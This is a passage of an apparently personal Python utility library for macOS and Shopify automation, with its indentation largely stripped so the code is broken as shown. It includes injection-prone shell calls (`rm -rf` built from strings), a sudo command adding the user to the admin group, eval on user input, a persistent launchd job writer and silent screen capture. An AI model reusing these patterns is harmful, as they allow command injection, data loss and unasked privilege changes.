'Google Shopping / Custom Product',
'Google Shopping / Custom Label 0',
'Google Shopping / Custom Label 1',
'Google Shopping / Custom Label 2',
'Google Shopping / Custom Label 3',
'Google Shopping / Custom Label 4',
'Variant Image',
'Variant Weight Unit',
'Variant Tax Code']
x = dictfromkeys(headers, default_value = "")
x.update({"Option1 Name": getitem(key("name",options), 0, ""), "Option2 Name": getitem(key("name",options), 1, ""), "Option3 Name": getitem(key("name",options), 2, ""), "Title": title, "Body (HTML)": description, "Vendor": "", "Type": product_type, "Tags":"", "Published":"true", "Image Src":images[0]["src"], "Gift Card": "false", "Variant Image": images[0]["src"]})
image_position = 0
variants_ = []
for idx, variant in enumerate(variants):
variant_ = dictfromkeys(headers, default_value="")
if idx==0: variant_.update(x)
variant_["Handle"] = "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
variant_["Option1 Value"] = variant.get("option1", "")
variant_["Option2 Value"] = variant.get("option2", "")
variant_["Option3 Value"] = variant.get("option3", "")
variant_["Variant SKU"] = variant.get("sku", "")
variant_["Variant Grams"] = variant.get("weight", "")*100
variant_["Variant Weight Unit"] = "kg"
variant_["Variant Inventory Tracker"] = variant["inventory_management"]
variant_["Variant Inventory Qty"] = variant["inventory_quantity"]
variant_["Variant Inventory Policy"] = variant["inventory_policy"]
variant_["Variant Fulfillment Service"] = "manual"
variant_["Variant Price"] = variant["price"]
variant_["Variant Compare At Price"] = variant["compare_at_price"]
variant_["Variant Requires Shipping"] = "true"
variant_["Variant Taxable"] = "true"
variant_["Image Src"] = images[ sku_image_dict[variant.get("sku")] ]["src"] if sku_image_dict!={} else images[0]["src"]
image_position += 1
variant_["Image Position"] = image_position
variant_["Variant Image"] = images[ sku_image_dict[variant.get("sku")] ]["src"] if sku_image_dict!={} else ""
variants_.append(variant_)
if len(images) > len(variants_):
for idx, image in enumerate(images[ len(variants_): ]):
variant_ = dictfromkeys(headers, default_value="")
variant_["Handle"] = "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
variant_["Image Src"] = image["src"]
image_position += 1
variant_["Image Position"] = image_position
variants_.append(variant_)
fn = homepath("~/tavern/tavern/bag/products_%s.csv" % (generate_one_random_number(10)))
CSV().DictWriteWithHeaders(fn, variants_, headers = headers)
def productgost(x):
GhostProduct().productgost(x)
def randomised(x):
random.shuffle(x)
return x
def rangelen(x):
return range(len(x))
def raw_input(x=None):
return eval(input(""))if(None==x)else(eval(input(x)))
def re_findall_overlaps(regex_string, x):
groups_regex = '(?=(' + regex_string + '))'
print("groups regex: %s" % groups_regex)
matches = re.finditer(groups_regex,x)
results = [match.group(1) for match in matches]
print("%s matches" % len(results))
return results
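# Illustrative usage (added example): overlapping matches that a plain re.findall would miss.
"""
re_findall_overlaps("aba", "ababa")
# expected: ['aba', 'aba']
"""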
def re_found_function(x,r,method):
if findall(x,r):
return method(x)
else:
return x
def re_spaces(x):
return re_substitute(x,["\s+"," "]).strip()
def re_substitute(x,y):
return re.sub(y[0],y[1],x)
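# Illustrative usage (added example); re_spaces above builds on this to collapse whitespace.
"""
assert re_substitute("a  b   c", [r"\s+", " "]) == "a b c"
"""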
def re_substitute_function(x,r,method):
found = findall(x,r)
    if len(found) == 0: print("No matches found")
print(x)
random_strings = []
multiplier = 10000
for i in lrange(len(found)):
random_strings.append("<<<<<%s>>>>>"%(random.choice(string.ascii_letters)*multiplier))
multiplier = multiplier * 10
for i,j in zip(found,random_strings): x = x.replace(i,j)
y = lmap(lambda i:str(method(i)),found)
for i,j in tcer(list(zip(random_strings,y))): x = x.replace(i,j)
print(x)
return x
def readministrate():
import getpass
os.system("sudo -passwd admin")
os.system("sudo dscl . -append /Groups/admin GroupMembership %s"%(getpass.getuser()))
def rfloat(r1 = 0.2, r2 = 0.7):
return random.uniform(r1, r2)
def rm(address):
subprocess.getoutput("""rm -rf "%s" """%address)
def safarijs(x):
blueprint("Safari -> Advanced -> Show develop menu ; Develop -> Allow JavaScript from Apple Events")
x = 'tell application "Safari" to do JavaScript "%s" in current tab of window 1'%x
fn = ".%s.scpt" % str(generate_one_random_number(10))
blueprint(fn)
open(fn, "w").write(x)
r = subprocess.getoutput("osascript %s"%fn)
os.remove(fn)
return r
"""
x = "window.location.href = 'https://google.com'"
safarijs(x)
"""
def save_default_aceintheholedata():
exec('def x(y, ):\n from decimal import Decimal\n import datetime\n from dateutil.tz import tzoffset\n globals().update(locals())\n fields = key("name", y._meta.fields)\n blueprint("Save(%s, "%(type(y).__name__), end="")\n for i in fields:\n z = getattr(y, i)\n r = None\n import datetime\n if type(z) == str:\n r = \'%s = """%s""", \'%(i, z)\n elif type(z) == datetime.datetime:\n r = \'%s = datetime.datetime(%s, %s, %s, %s, %s, %s, %s), \'%(i, z.year, z.month, z.day, z.hour, z.minute, z.second, z.microsecond)\n elif type(z) == datetime.date:\n r = \'%s = datetime.date(%s, %s, %s), \'%(i, z.year, z.month, z.day, )\n else:\n r = "%s = %s, "%(i, z)\n blueprint(r.replace("\\n", "\\\\n"), end="")\n blueprint(")", end="")\n blueprint("\\n")',globals())
import datetime
from decimal import Decimal
Save(AceInTheHole, id = 408, account = """Chase""", date = datetime.datetime(2019, 4, 29), amount = 10.0, type = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", tag = """STRIPE""", description = """STRIPE""", )
Save(AceInTheHoleType, id = 18, name = """BUSINESS_OTHER_CONTRACT_LABOR""", )
Save(AceInTheHoleType, id = 19, name = """BUSINESS_OTHER_HOSTING""", )
Save(AceInTheHoleType, id = 20, name = """BUSINESS_OTHER_SUBSCRIPTIONS""", )
Save(AceInTheHoleType, id = 14, name = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", )
Save(AceInTheHoleType, id = 15, name = """BUSINESS_PAYMENT_GATEWAY_WITHDRAWALS""", )
Save(AceInTheHoleType, id = 17, name = """BUSINESS_PURCHASING_ADS""", )
Save(AceInTheHoleType, id = 16, name = """BUSINESS_PURCHASING_PRODUCTS""", )
Save(AceInTheHoleType, id = 22, name = """PERSONAL_FOOD""", )
Save(AceInTheHoleType, id = 21, name = """PERSONAL_NOT_FOOD""", )
Save(AceInTheHoleTypeTag, id = 12, type = """BUSINESS_PURCHASING_PRODUCTS""", tag = """Ali""", sign = """negative""", )
Save(AceInTheHoleTypeTag, id = 13, type = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", tag = """Stripe Deposit""", sign = """positive""", )
Save(AceInTheHoleTypeTag, id = 29, type = """PERSONAL_NOT_FOOD""", tag = """METROCARD""", sign = """negative""", )
Save(AceInTheHoleTypeTag, id = 30, type = """PERSONAL_NOT_FOOD""", tag = """ATM FEE""", sign = """negative""", )
def savepickles(*args,**kws):
pickle.dump([i for i in args if type(i)!=str][0],open([i for i in args if type(i)==str][0],'wb'))
ifdo(lambda:kws.get('copypickles'),lambda:savepickles(args[0],kws['copypickles']))
return args[0]
def saveobj(x):
import _pickle
import pickle
import dill
return dill.dumps(x)
def sch(x):
from spellchecker import SpellChecker as sch
sch = sch()
a = list(set(re.findall("[\w']+",x)))
b = pool(lambda i: sch.correction(i), a).result()
e = dict(zip(a,b))
c = [i for i in a if i not in b]
distinct_print(c)
for i in c:
while True:
print("+1",i)
d=tryreturn(lambda:next(re.finditer("""[^\w'](%s)(?:[^\w']|$)"""%(i),x)))
if d:
blueprint(x)
x = "".join([x[:d.start()],x[d.start():d.start()+1],e[i],(x[d.end()-1:d.end()])if(x[d.end()-1:d.end()]==" ")else(" "),x[d.end():]])
greenprint(x)
else:
break
x = x.upper()
return x
"""
x = '''hello,
ths is col
hllo.
bye\tyes4 123
'''
"""
def screenshot(address=None):
if address == None:
os.makedirs(homepath("~/tavern/tavern/soda/dls"), exist_ok = True)
address = homepath("~/tavern/tavern/soda/dls/%s.png"%(random.randrange(9999999999999)))
magentaprint("generated address: %s" % address)
greenprint("saving to address: %s" % address)
os.system("""screencapture -x "{}" """.format(address))
return address
def sedremoveline(file,line_numbers):
os.system("""sed -i "" -e "%sd" '%s'"""%((",".join(lmap(str,line_numbers))),file))
"""
os.system('''echo -e "line1\nline2\nline3\nx" > infile''')
sedremoveline("infile",[1,2])
assert open("infile").read() == 'line3\nx\n'
rm("infile")
"""
def setadd(x,y):
if y not in x:
x.add(y)
return x
def setattrs(x, *args, **kwargs):
from types import MethodType,ModuleType,FunctionType
for a,b in kwargs.items():
setattr(x,a,b)
for a,b in zip(args[0::2],args[1::2]):
if type(b) == FunctionType or type(b) == MethodType:
b = tryreturn(lambda: b())
setattr(x,a,b)
"""
a = AD()
setattrs(a,"x",2,"y",3,"z",4)
"""
def setfrom(x, *args):
return [i(x) for i in args]
"""
setfrom(1, lambda i: i, lambda i: i)
"""
def setitem(x, k, v):
x[k] = v
def setitems(x,*args):
for i,j in zip(args[0::2],args[1::2]):
x[i] = j
def show_in_list(a,b):
a = copy.deepcopy(a)
b = copy.deepcopy(b)
x = []
for i in a:
if i in b:
x.append(i)
b.__delitem__(b.index(i))
return x
"""
assert show_in_list([1,2,3,4],[1,2]) == [1,2]
assert show_in_list([10,10],[10]) == [10]
assert show_in_list([10,10],[10,11]) == [10]
"""
def show_overhead(a, b):
# assert len(oset(a)) == len(a)
# assert len(oset(b)) == len(b)
a = copy.deepcopy(a)
b = copy.deepcopy(b)
x = []
for i in a:
if i not in b:
x.append(i)
elif i in b:
b.__delitem__(b.index(i))
return x
"""
show_overhead([1,2,3,4],[1,2])
show_overhead([10,10],[10])
"""
def shuffled(x):
if type(x) is str:
x = list(x)
random.shuffle(x)
return x
else:
x = list(x)
random.shuffle(x)
return x
return x
def shutil_move(a, b):
import shutil
shutil.move(a, b)
def similar(a, b):
from difflib import SequenceMatcher
return SequenceMatcher(None, a, b).ratio()
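# Illustrative usage (added example): SequenceMatcher ratio between 0 and 1.
"""
assert similar("abc", "abc") == 1.0
assert 0 < similar("shirt", "t-shirt") < 1
"""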
def slank(key,dict_):
return dict_.pop(key)
def slow_url(x):
return x.split("?")[0]
def sorted_list_matching(x,y):
z = lmap(lambda i:None,x)
for i in x:
index = y.index(i)
z[index] = i
return z
"""
a = [2,1,3]
b = [1,2,3]
sorted_list_matching(a,b)
"""
def sorted_set(x):
return list(sorted(list(set(x))))
def soupy(soup,x=None,y=None,z=None):
import bs4
if type(soup) != bs4.BeautifulSoup: soup = BeautifulSoup(soup)
if x==None: return soup
return(soup.findAll(x)if(None==y==z)else(soup.findAll(x,attrs={y:z})))
def sql_get_multiple_primary_keys(x):
with open(__file__,"r") as f:
return [i.strip().split("=")[0].strip() for i in re.findall(r"(?s)(class %s\(Worksheet\):.*?)class"%x.__name__,f.read())[0].strip().split("\n") if((-1!=i.find("AutoField()"))or(-1!=i.find("unique=True"))or(-1!=i.find("primary_key=True")) )]
def sqltroubleshoot():
os.system("""rm /usr/local/etc/my.cnf && echo "Removed mysql cnf file." sleep 5 && echo "Stopping mysql." && sleep 5 && brew services stop mysql & sleep 5 && mysqld & sleep 5 && echo "Running py2_file again to set up mysql cnf file." && sleep 5 && cd ~/tavern/tavern/soda && /usr/bin/python -B -c "from py2_file import *; Setter_Upper().m15__17_initiate_install_mysql__and__create_database_soda()" ;""")
def strand(func, *args, **kwargs):
from threading import Thread
t = Thread(target=func, args=args, kwargs=kwargs)
t.start()
return t
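# Illustrative usage (added example):
"""
t = strand(print, "hello from a thread")
t.join()
"""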
def strands(func, x, c=32, *args, **kwargs):
for idx, i in enumerate(array_split(x, c)):
stuff = []
for j in i:
stuff.append(strand(func, j, *args, **kwargs))
for s in stuff:
s.join()
print("%s out of %s at %s per done for %s"%(idx, (len(x)/c), c, func.__name__))
def strcls(x,**kwargs):
return type("a",(str,),kwargs)(x)
"""
r = intcls("asdf",print = lambda self:print(self))
r.print()
"""
def sud(dictlist, key):
if type(dictlist) is str:
dictlist2 = dictlist
dictlist = key
key = dictlist2
try: return [getattr(i, key) for i in list(dictlist)]
except: return [i[key] for i in list(dictlist)]
def sudby(x,y):
return or_list(lambda:[i for i in y if x(i)],lambda:[i for i in y if x(*i)],[])
def sudcall(key, dictlist, *args, **kwargs):
try: return [getattr(i, key)(*args, **kwargs) for i in list(dictlist)]
except: return [i[key](*args, **kwargs) for i in list(dictlist)]
def sudsort(key, dictlist, tcer=True):
import operator
if type(key) is not list:
key = [key]
try: return sorted(list(dictlist), key=operator.itemgetter(*key), reverse=tcer)
except: return sorted(list(dictlist), key=operator.attrgetter(*key), reverse=tcer)
def sudsort_multi(columns, items, tcer=False):
from operator import itemgetter, attrgetter
from functools import cmp_to_key
comparers = None
if tryprocess(lambda:items[0].get(columns[0])): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]
else: comparers = [((attrgetter(col[1:].strip()), -1) if col.startswith('-') else (attrgetter(col.strip()), 1)) for col in columns]
def comparer(left, right):
def cmp(a, b):
if a == None and b == None: return 0
if a == None and b != None: return 1
if a != None and b == None: return -1
elif a != None and b != None: return (a > b) - (a < b)
comparer_iter = ( cmp(fn(left), fn(right)) * mult for fn, mult in comparers)
return next((result for result in comparer_iter if result), 0)
return sorted(list(items), key=cmp_to_key(comparer), reverse=tcer)
def swamp(*args):
a, b = args[0], args[1]
for x, y in zip(a, b):
if y() == True:
return x()
"""
a, b, c = 1,0,0
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
a, b, c = 0,1,0
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
a, b, c = 0,0,1
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
swamp([lambda: 1, lambda: 2, lambda: 3], [lambda: a==True, lambda: b==True, lambda: c==True])
def ard():
print(d)
def r():
a = 1
b = 0; c= 0; d=5
    swamp([lambda: 1, lambda: 2, lambda: 3], [lambda: a==True, lambda: b==True, lambda: c==ard()])
(1)if(a==True)else(2)if(b==True)else(3)if(c==ard())else()
"""
def sys_exit():
[exec("import sys",globals()), sys.exit()]
def tcer(x,a=0):
return reversed(x)if(a==0)else(list(reversed(x)))
def text_to_docx(text, filename):
from docx import Document
document = Document()
paragraph = document.add_paragraph(text)
from docx.shared import Pt
style = document.styles["Normal"]; document.styles["Normal"].font.name = "Times New Roman"; document.styles["Normal"].font.size = Pt(4);
paragraph.style = document.styles["Normal"]
document.save(filename)
def text_to_image(text):
from PIL import Image, ImageDraw, ImageFont
if text == "":
text = "\n"
img = Image.new('RGB', (1800, 540), color = (255, 255, 255))
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", 20)
d = ImageDraw.Draw(img)
d.text((0,0), text, font=fnt, fill=(0, 0, 0))
font_size = d.textsize(text, fnt)
img = Image.new('RGB', font_size, color = (255, 255, 255))
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", 20)
d = ImageDraw.Draw(img)
d.text((0,0), text, font=fnt, fill=(0, 0, 0))
address = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
img.save(address)
impreview(address)
os.remove(address)
def textplot(L,a,b):
def divs(x,c):
return [int(x/c)*i for i in range(c+1)]
Q=divs(a,b) + [max(L)]
def slot_file(L,x):
r = []
for idx, i in enum(x[:-1]):
r.append(["%s-%s"%(i,x[idx+1]),len(sorted([a for a in L if a>i and a<=x[idx+1]]))])
return r
slot_file(L,Q)
data= slot_file(L,Q)
max_value = max(count for _, count in data)
increment = max_value / 25
longest_label_length = max(len(label) for label, _ in data)
O = []
for label, count in data:
bar_chunks, remainder = divmod(int(count * 8 / increment), 8)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
bar = bar or '▏'
O.append(bar+ " " + "(%s(%s))"%(str(label.rjust(longest_label_length).strip()),"%sCount"%(str(round(count,4)))) )
O = ("\n".join(O))
drkprint(O)
return O
def timed(r,x):
m = datetime.now()
R = process(r)
while True:
l = datetime.now()
if (l-m).seconds >=x and R.is_alive() == True:
drkprint("timed out at %s seconds, returning None"%(x))
return None
elif (l-m).seconds <x and R.is_alive() == False:
drkprint("timed in at %s seconds, "%(x))
break
return R.result()
def timed_input(prompt, x=10):
import select
cyanprint(prompt, end="")
sys.stdout.flush()
i,o,e = select.select([sys.stdin],[],[],x)
if (i):
response = sys.stdin.readline().strip()
print("You said %s" % response)
return response
else:
print("response [None]")
return None
def thread(f, x, c=32):
from multiprocessing.dummy import Pool
pool = Pool(c)
payload = pool.map(f, x)
pool.close()
pool.join()
return payload
def time_a_download(method, arg=None):
import time
current = get_dircount()
command = None
if arg:
command = 'method(%s)'%arg
else:
command = 'method()'
exec(command)
while get_dircount() == current and '.part' not in get_latest_download():
time.sleep(0.05)
time.sleep(5)
return get_latest_download()
def timeit(func):
def wrapper(*arg, **kw):
t1 = time.time()
res = func(*arg, **kw)
t2 = time.time()
print("timeit: %s, %s"%((t2 - t1), func.__name__))
return res
return wrapper
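# Illustrative usage (added example; assumes time is imported as elsewhere in this file):
"""
@timeit
def slow_add(a, b):
    time.sleep(0.1)
    return a + b
assert slow_add(1, 2) == 3  # also prints "timeit: <elapsed>, slow_add"
"""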
def timedretry(x,y):
z = multiprocessing_process(x)
time.sleep(y)
if z.is_alive():
z.terminate()
return timedretry(x,y)
else:
return
def timedtask(func):
def wrapper(*arg, **kw):
t1 = time.time()
start_datetime = datetime.now()
new = Timedtask()
new.function_name = func.__name__
existants = Filter(Timedtask,function_name=new.function_name)
zellums = key("elapsed",existants)
stis = (sum(zellums)/len(zellums))
redprint("stis")
roundulo = int(stis/100)
def sleeperman():
            for sleeptime in range(roundulo):
                lox = "█"*sleeptime
                sys.stdout.write(lox)
sys.stdout.flush()
time.sleep(sleeptime)
import multiprocessing
p = multiprocessing.Process(target=sleeperman)
p.start()
        res = pool(func, *arg, **kw)
p.terminate()
sys.stdout.write(("█"*10)+" %100")
res = res[0]
t2 = time.time()
end_datetime = datetime.now()
elapsed_time = (end_datetime - start_datetime).seconds
print("elapsed: time: %s" % elapsed_time)
print("timeit: %s, %s"%((t2 - t1), func.__name__))
new.start = start_datetime
new.end = end_datetime
new.elapsed_time = elapsed_time
new.my_time_elapsed = (1.1574074074074073e-05) * elapsed_time
new.my_time_start = Date().myDatetimenow(start_datetime)
new.my_time_end = Date().myDatetimenow(end_datetime)
new.save()
distinct_print(ordered_json_dumps(new.__dict__))
return res
return wrapper
def timer(t, func, *args, **kwargs):
t = Timer(t, func, args=args, kwargs=kwargs)
t.start()
return t
def timestamp(x,forward=True):
if forward == True:
timestamp = datetime.timestamp(x)
return timestamp
elif forward == False:
datetime_ = datetime.fromtimestamp(x)
return datetime_
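# Illustrative usage (added example): round-trips a datetime through a POSIX timestamp.
"""
d = datetime(2020, 1, 1)
t = timestamp(d)
assert timestamp(t, forward=False) == d
"""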
def tinyurl(url):
return requests.get("http://tinyurl.com/api-create.php?url=%s"%(url)).text
def tp(func, *args, ep=0, error = None, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return 1
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def tr(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def transfer_bash():
os.system("""rm ~/tavern/tavern/soda/bash_profile; cp -r ~/.bash_profile ~/tavern/tavern/soda/bash_profile""")
def transfer_workflows():
[os.system("rm -rf /Users/$USER/tavern/tavern/soda/*.workflow"),[os.system("cp -r ~/Library/Services/%s ~/tavern/tavern/soda/%s"%(i,i)) for i in os.listdir(homepath("~/Library/Services")) if i.endswith(".workflow")]]
def transpose(x):
import numpy as np
x = np.transpose(x)
x = [list(i) for i in x]
return x
"""
x = [[1,2],
[1,2]]
greenprint(transpose(x))
"""
def trykeycall(key, dictlist, *args, **kwargs):
try: return [tryprocess(getattr(i, key), *args, **kwargs) for i in list(dictlist)]
except: return [tryprocess(i[key], *args, **kwargs) for i in list(dictlist)]
def trylmap(f, x, *args, **kwargs):
Q = []
for i in x:
Z = tryprocess(f, i, *args, **kwargs)
Q.append(Z)
return Q
def tryprocess(func, *args, ep=0, error = None, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return 1
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def tryreturn(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def typecls(x,**kwargs):
return type("a",(int,),kwargs)(x) if type(x)==int else(
type("a",(str,),kwargs)(x)) if type(x)==str else(
type("a",(list,),kwargs)(x)) if type(x)==list else(
type("a",(float,),kwargs)(x)) if type(x)==float else(
type("a",(Time,),kwargs)(x)) if type(x)==datetime else(
type("a",(dict,),kwargs)(x)) if type(x)==dict else()
def uli(x,y,z=-1):
return x.split(y,z)
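# Illustrative usage (added example): split with an optional maxsplit.
"""
assert uli("a/b/c", "/") == ["a", "b", "c"]
assert uli("a/b/c", "/", 1) == ["a", "b/c"]
"""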
def unpack_archive(address):
import shutil
import zipfile
shutil.unpack_archive(address, "%s.zip"%address)if(os.path.isdir(address))else(zipfile.ZipFile(address,"r").extractall(os.getcwd()))
def update(x,**kwargs):
lmap(lambda k,v: setitem(x,k,v), list(kwargs.items()))
return x
"""
assert update({"a":"b"},e=5) == {'a': 'b', 'e': 5}
"""
def urlopenproduct(product,url):
[pyperclip.copy(url%(product.handle)), OSA.log("Press OK"), OSA("Google Chrome 70",["ctrl_t","ctrl_l","ctrl_v","return"])]
def valuelist(x):
return {a:b for a,b in x}
"""
valuelist([(1,2), (2,3), (3,4)])
"""
def varsave(x):
'def varsave(x):\n image_ids = key("image_id", x.variants)\n first_save = apilimitcall(x.save)\n assert first_save == True\n image_ids_after_save = key("image_id", x.variants)\n if image_ids_after_save != image_ids:\n for a, b in zip(x.variants, image_ids):\n a.image_id = b\n pool(lambda i: apilimitcall(i.save), x.variants, nodes=4).result()\n if len(x.variants) > 50:\n time.sleep(0.2)\n return x'
image_ids = key("image_id", x.variants)
first_save = apilimitcall(x.save)
assert first_save == True
image_ids_after_save = key("image_id", x.variants)
if image_ids_after_save != image_ids:
for a, b in zip(x.variants, image_ids):
a.image_id = b
image_ids_x = oset(sud("image_id",x.variants))
new = dictfromkeys(image_ids_x,[])
for a, b in new.items():
new[a] = sud("id",filter(x.variants,image_id=a))
for a, b in new.items():
y = filter(x.images,id=a)[0]
y.variant_ids = new[a]
x.save()
# pool(lambda i: apilimitcall(i.save), x.variants, nodes=6).result()
# if len(x.variants) > 50:
# time.sleep(0.2)
return x
def versioncheck(x,z=None):
exec("import selenium; bprint(selenium.__version__); y = selenium.__version__",globals())
if z:os.system("pip install %s==%s"%(x,z))
return y
def viden(x,*args):
print(args)
for i,j in zipeven(args[0::2],args[1::2],None):
if j == None:
x = x.split(i)
else:
x = x.split(i)[j]
return x
"""
viden("asdfa","a",1)
"""
def wall(i):
return ceil(i)if((i)%1>=0.5)else(floor(i))
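# Illustrative usage (added example; assumes ceil/floor are imported from math elsewhere in this file): round-half-up.
"""
assert wall(2.5) == 3
assert wall(2.49) == 2
"""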
def word_multiply(l1,l2):
x = []
for i in l1:
for j in l2:
x.append([i,j])
x.append([j,i])
return x
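# Illustrative usage (added example): every ordered pairing of the two lists.
"""
word_multiply(["red"], ["shirt", "hat"])
# expected: [['red', 'shirt'], ['shirt', 'red'], ['red', 'hat'], ['hat', 'red']]
"""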
def wordcount(x):
apostrophes = x.count("'")
words = len(x.split(" "))
count = apostrophes + words
return count
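# Illustrative usage (added example): space-separated words plus one per apostrophe.
"""
assert wordcount("it's a test") == 4
"""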
def writew(x,y):
open(x,"w").write(y)
return x
def writewb(x,y):
open(x,"wb").write(y)
return x
def write_xlsx_cell(cell,x,wb=None,save=False):
ws = None
if globe("workbook"):
wb = globe("workbook")
ws = wb.worksheets[0]
else:
import openpyxl
wb = ifelseget(lambda:os.path.exists(wb),lambda:openpyxl.load_workbook(wb),lambda:openpyxl.Workbook())
ws = wb.worksheets[0]
globalise(wb,"workbook")
ws[cell].value = x
if save:
wb.save("out.xlsx")
return wb
def xir(x,**kwargs):
[setattr(x,i,j) for i,j in kwargs.items()]
return x
def xplist(x):
r = '\n <?xml version="1.0" encoding="UTF-8"?>\n <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n <plist version="1.0">\n <dict>\n <key>Label</key>\n <string>{}</string>\n <key>ProgramArguments</key>\n <array>\n <string>/Users/%s/tavern/bin/python3.5</string>\n <string>-c</string>\n <string>{}</string>\n </array>\n <key>UserName</key>\n <string>%s</string>\n <key>StandardOutPath</key>\n <string>{}</string>\n <key>StandardErrorPath</key>\n <string>{}</string>\n <key>KeepAlive</key>\n <true/>\n </dict>\n </plist>\n '%(getuser(),getuser())
title = "%s"%([exec("import nltk",globals()),random.sample(random.sample(list(nltk.wordnet.wordnet.all_synsets(nltk.wordnet.wordnet.NOUN)),1)[0].lemmas(),1)[0].name()][1])
os.makedirs(homepath("~/tavern/tavern/soda/plists"),exist_ok=True)
save_path = homepath("~/tavern/tavern/soda/plists/%s.plist"%(title))
y = 'import os; os.chdir(os.path.expanduser("~/tavern/tavern")); from soda.can import *; %s'%(x)
x = r.format(save_path.split("/")[-1].split(".")[0],y,save_path+".out",save_path+".err").strip().replace("\n ", "\n")
open(save_path, "w").write(x)
return x
def zipUtil(address,reverse=not True):
if reverse!=True:
# - zip - a file
redprint(" # - zip - a file ---- ")
# set original path
redprint(" # set original path ---- ")
setitem(globals(),"cwd",os.getcwd())
# normalize address
redprint(" # normalize address ---- ")
setitem(globals(),"address",address_normalize(address))
# chdir from homepath to /Users, ~/picture.png to homepath, tryprocess from picture.png to `""`
redprint(" # chdir from homepath to /Users, ~/picture.png to homepath, tryprocess from picture.png to `""` ---- ")
tryprocess(os.chdir, "/".join(globals()["address"].split("/")[:-1]))
# set address to ./`address`
redprint(" # set address to ./`address` ---- ")
setitem(globals(),"address",globals()["address"]if(-1==globals()["address"].find("/"))else(globals()["address"].split("/")[-1]))
# remove the directed address
redprint(" # remove the directed address ---- ")
subprocess.getoutput(""" rm -rf "%s.zip" """%globals()["address"])
# waitfor directed address gone
redprint(" # waitfor directed address gone ---- ")
while(1==os.path.exists("%s.zip"%globals()["address"])): time.sleep(0.1)
# zip ~/tavern/tavern/drawings to ./drawings.zip
redprint(" # zip ~/tavern/tavern/drawings to ./drawings.zip ---- ")
subprocess.getoutput("""zip -r "%s.zip" "%s" """%(globals()["address"],globals()["address"]))
# waitfor gone not directed address
redprint(" # waitfor gone not directed address ---- ")
while(0==os.path.exists("%s.zip"%globals()["address"])): time.sleep(0.1)
# revert to original path
redprint(" # revert to original path ---- ")
os.chdir(globals()["cwd"])
redprint(address+".zip",)
return address+".zip"
elif reverse==True:
# - unzip - a file
redprint(" # - unzip - a file ---- ")
# remove&waitfor directed folder address
redprint(" # remove&waitfor directed folder address ---- ")
subprocess.getoutput("""rm -rf "%s" """%(address[:-4]))
while(1==os.path.exists(address[:-4])): time.sleep(0.1)
# unzip&waitfor directed folder address
redprint(" # unzip&waitfor directed folder address ---- ")
if "/" in address:
direc = "/".join(address.split("/")[:-1])
os.chdir(direc)
subprocess.getoutput("""unzip "%s" """%(address))
#while(0==os.path.exists(address[:-4])): time.sleep(0.1)
# remove&waitfor original zip address
redprint(" # remove&waitfor original zip address ---- ")
subprocess.getoutput("""rm -rf "%s" """%(address))
#while(1==os.path.exists(address)): time.sleep(0.1)
redprint(address[:-4],)
return address[:-4]
def zipeven(x,y,z):
x, y = list(x), list(y)
if len(x) != len(y):
if len(y) > len(x):
x.append(z)
elif len(x) > len(y):
y.append(z)
return zip(x,y)
"""
assert list(zipeven([1,2,3],[1,2],None)) == [(1, 1), (2, 2), (3, None)]
assert list(zipeven([1,2],[1,2,3],None)) == [(1, 1), (2, 2), (None, 3)]
"""
def zki(x,y,z):
if x():
return lmap(y,z)
else:
return z
"""
zki(lambda: 1==1, lambda i: i+1, [1,2,3])
zki(lambda: 1==2, lambda i: i+1, [1,2,3])
"""
def zz(x):
#print("sleeping %s"%x); time.sleep(x)
time.sleep(x)
class AD(dict):
def __recurse__(self):
keys_to_change = []
for a,b in self.items():
#print(v,"\n")
if "values" in dir(b):
keys_to_change.append(a)
for a in keys_to_change:
self[a] = AD(self[a])
list_keys = []
for a,b in self.items():
if "append" in dir(b) and "extend" in dir(b):
list_keys.append(a)
for a in list_keys:
self[a] = [AD(i) if "values" in dir(i) else i for i in self[a]]
def __getattr__(self, attr):
self.__recurse__()
#print(self[attr])
return self[attr]
def __setattr__(self, attr, value):
self[attr] = value
self.__recurse__()
def copy(self):
return AD(self)
def __test__(self):
d = {"a": {"a": {"a": "a"}}}
dd = AD(d)
assert "AD" in str(type(dd))
assert "AD" in str(type(dd.a))
assert "AD" in str(type(dd.a.a))
dd.b = d
dd["c"] = d
assert "AD" in str(type(dd.b))
assert "AD" in str(type(dd.b.a))
assert "AD" in str(type(dd.b["a"]))
assert "AD" in str(type(dd.c))
assert "AD" in str(type(dd["c"].a))
assert "AD" in str(type(dd["c"]['a']))
dd.update({"e":{"a":{"a":1}}})
assert "AD" in str(type(dd.e.a))
